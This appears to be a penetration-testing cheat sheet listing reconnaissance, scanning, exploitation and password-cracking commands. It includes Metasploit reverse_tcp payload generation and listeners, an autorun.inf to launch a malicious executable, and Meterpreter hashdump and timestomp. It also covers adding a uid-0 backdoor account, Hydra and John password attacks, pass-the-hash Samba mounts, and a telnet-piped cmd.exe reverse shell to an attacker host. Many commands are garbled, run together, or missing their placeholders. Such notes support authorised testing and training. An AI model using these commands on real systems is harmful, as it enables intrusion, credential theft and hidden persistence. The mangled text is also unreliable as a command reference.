whois

$ whois [-h whois_server] name

nslookup

$ nslookup 

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV

$ dig [@server] 
 [type]
  • Zone transfer

$ dig [@server] 
 -t AXFR
  • Iterative zone transfer

$ dig [@server] 
 -t IXFR=

BiLE.pl

$ ./BiLE 
 
$ ./BiLE-weigh.pl 
 
$ ./tld-expand.pl$ ./vet-IPrange.pl$ ./qtrace.pl

snmpwalk

Dump the ARP table of an snmp server at HOST

$ snmpwalk -v 2c -c 
 
 ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

  • -n -- use numbers

  • -i <interface>

  • -v -- be verbose

  • -r <file>/-w <file> -- read from/write to file

  • -x -- print hex

  • -A -- print ASCII

  • -X -- print hex and ASCII

  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol

    • ether, ip, ip6, arp, rarp, tcp, udp

  • Type

    • host <host>

    • net <network>

    • port <portnum>

    • portrange <start-end>

  • Direction

    • src

    • dst

  • Logic

    • and

    • or

  • Show TCP against target 10.10.10.10 in ASCII

tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
  • Show all UDP from 10.10.10.10

tcpdump [-i tap0] -n udp and src 10.10.10.10
  • Show all TCP port 80 packets going to or from host 10.10.10.10

tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest

  • --interface <int>

Source selection

  • --spoof <hostname>

  • --rand-source

Port selection

  • --destport <port>

  • --destport +<port> -- increment by one for each packet received

  • --destport ++<port> -- increment by one for each packet sent

  • --scan <portrange>

  • --baseport <port>

  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood

  • --interval <N> -- interval in seconds

  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>

  • --beep

  • --file <filename>

  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL

  • -g <hostlist> -- Loose source route

  • -I -- use ICMP Echo instead of UDP

  • -m <N> -- maximum number of hops (default 30)

  • -n -- numeric

  • -p <baseport> -- set the base UDP port

  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

Options

  • -u -- use UDP

  • -p -- use ICMP echo

  • -d <port> -- destination port (default 80)

  • -s <port> -- source port

  • -L <N> -- length (including layer 3/4 header)

  • -A -- look up AS number

  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping

  • -PB -- default, ICMP Echo + TCP to port 80

  • -PE -- ICMP Echo request

  • -PS[portlist] -- TCP SYN

  • -PP -- ICMP Timestamp request

  • -PM -- ICMP Address Mask request

  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan

  • -sS -- SYN scan

  • -sA -- ACK scan

  • -sF -- FIN scan

  • -sN -- Null scan

  • -sX -- Xmas Tree scan

  • -sM -- Maimon scan

  • --scanflags specify your own flags

  • -sU -- UDP scan

Fingerprinting

  • -O -- OS fingerprint

  • -sV -- Version scan

Scripts

  • -sC -- run all scripts

  • --script=<category,dir,src,etc&/gt;

  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane

  • --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay

Other options

  • -p<ports>

  • -F -- fast (checks only ports in nmap-services)

  • --packet-trace

  • --traceroute

  • --badsum

THC amap

Options

  • -q -- quiet (omit closed ports)

  • -v -- verbose

  • -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely:

$ finger @

Exploitation

netcat

Options

  • -l -- listen mode

  • -L -- listen harder (Windows only)

  • -u -- UDP mode

  • -p -- local port (in listen mode, the port to listen on)

  • -e -- program to execute

  • -n -- don't resolve names

  • -z -- don't send any data

  • -w<N> -- timeout for connects

  • -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1 
 

Setting up a relay

mknod backpipe pnc -l -p 
 < backpipe | nc 
 
 > backpipe

Relaying port 22 to the local system

mknod backpipe pnc -l -p 
 < backpipe | nc localhost 22 > backpipe

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -printfind /sbin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -printfind /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done

Metasploit

Running an exploit

msf> show exploitsmsf> use exploit/windows/smf/ms05_039_phpmsf> show payloadsmsf> set PAYLOAD windows/shell/bind_tcpmsf> show optionsmsf> set RHOST 10.10.10.10msf> exploit

Interacting with sessions

msf> sessions -lmsf> sessions -i 

Creating a malicious VBScript

$ msfpayload windows/meterpreter/reverse_tcp LHOST=
 V$ msfpayload windows/vncinject/reverse_tcp LHOST=
 DisableCourtesyShell=y V

Creating a malicious Exe

$ msfpayload windows/meterpreter/reverse_tcp LHOST=
 X$ msfpayload windows/vncinject/reverse_tcp LHOST=
 DisableCourtesyShell=y X

Example autorun.inf file to run a malicious exe (goes with Metasploit)

[autorun]open=example.exeicon=example.exe

Metasploit listener

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=
 E$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=
 DisableCourtesyShell=y E

Meterpreter

Filesystem commands

> cd> lcd > pwd / getwd> ls> cat> download / upload> mkdir / rmdir> edit> getpid> getuid> ps> kill> execute> migrate> ipconfig> portfwd> route> idletime> uictl 
 

Modules

> use 
> use priv> hashdump> timestomp

Creating a user

Adding an ordinary user

useradd 

Adding a root user (note: a non-uid-0 account may be required to log in)

useradd -o -u 0 

telnet

Checking for inetd/xinetd

ps aux | grep inetd

Adding telnet to /etc/inetd

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Adding telnet to xinetd

  • Steal the file from a service that's running (files are in /etc/xinetd.d)

  • Change server to "/usr/sbin/in.telnetd"

Restarting inetd/xinetd (the "kill" command with the PID can also be used)

killall -HUP inetdkillall -HUP xinetd

sshd

File should be in /etc/rc*. Ways to enable:

chkconfig sshd onservice sshd start/etc/init.d/sshd start

Passwords

Dictionaries

Creating a dictionary

cat wordlist.txt | sort | uniq > dictionary.txt

Scraping a Web site

mkdir /tmp/sourcecd /tmp/sourcewget -r -l 
 
cd ..grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst

Or, just use 

Account lockout

grep tally /etc/pam.d/*grep tally /etc/pam.conf

pw-inspector

Options

  • -i -- input file

  • -o -- output file

  • -m <N> -- minimum length

  • -M <N> -- maximum length

  • -c <N> -- the number of criteria

    • -l -- lower case

    • -u -- upper case

    • -n -- numbers

    • -p -- printable characters (lower/upper/num)

    • -s -- special characters (all others)

Example

cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2

Hydra

Options

  • -l <username>/-L <userfile> -- Login name/file

  • -p <password>/-P <passfile> -- Password/file

  • -e <n|s|ns> -- extended checks (n = null, s = same as username)

  • -t <N> -- thread count

hydra 
 
 <-l 
|-L 
> <-p 
|-P 
> [-e 
] [-t 
]

smb password

hydra 
 smb -l george -P ./list.lst -e ns

ssh password

hydra 
 ssh2 -l george -P ./list.lst -e ns

John

Show cracked passwords

john --show 

Speed test

john --test

Running against a password file

john 

Specifying type type

john --format=
 
john --format=nt /tmp/pwdump

Combining passwd/shadow

unshadow 
 
 > combined.txtjohn combined.txt

Modified Samba

Loading the hash

export SMBHASH="
:
"echo $SMBHASH

Mounting a drive

./smbmount //
/
 
 -o username=
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

Adding a user

./net user ADD 
 
 -I 
 -U 
./net rpc group ADDMEM administrators 
 -I 
 -U 

Web

nikto.pl

Scanning

nikto.pl -h 

Updating

nikto.pl -update

Single check

nikto.pl -Single

Fancy tricks

Double-telnet

On the attacker machine

nc -l -p 4444nc -l -p 5555

On the victim machine

telnet 
 4444 | cmd.exe | telnet 
 5555